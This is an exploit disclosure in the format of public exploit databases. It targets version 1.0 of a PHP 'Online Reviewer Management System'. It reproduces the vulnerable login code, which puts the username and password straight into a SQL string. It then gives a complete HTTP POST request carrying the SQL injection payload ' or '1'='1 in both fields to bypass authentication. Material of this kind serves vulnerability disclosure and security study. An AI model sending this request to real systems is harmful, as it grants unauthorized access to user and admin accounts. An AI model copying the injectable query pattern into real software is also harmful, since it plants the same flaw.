# Exploit Title: Online Reviewer Management System Authentication ByPass
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10
#Vulnerable Source Code
#index.php
if(isset($_REQUEST['btn-login'])){
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
$user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'");
$user_retrieve->execute();
if($user_retrieve->rowCount() > 0){
while ($row = $user_retrieve->fetch()) {
$_SESSION['usertype_id'] = $row['usertype_id'];
$_SESSION['user_id'] = $row['user_id'];
$_SESSION['firstname'] = $row['fname'];
$_SESSION['middlename'] = $row['mname'];
$_SESSION['lastname'] = $row['lname'];
$_SESSION['course'] = $row['course'];
$usertype_id = $_SESSION['usertype_id'];
if($usertype_id == 3){
echo "<script type='text/javascript'>window.location.href = 'students/home/index/';</script>";
}
elseif ($usertype_id == 1 || $usertype_id == 2 ) {
echo "<script type='text/javascript'>window.location.href = 'admins/home/index/';</script>";
}
}
}
#Attack Request
POST / HTTP/1.1
Host: reviewmngmnt.olly
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://reviewmngmnt.olly/
Connection: close
Referer: http://reviewmngmnt.olly/
Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi
Upgrade-Insecure-Requests: 1
username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In
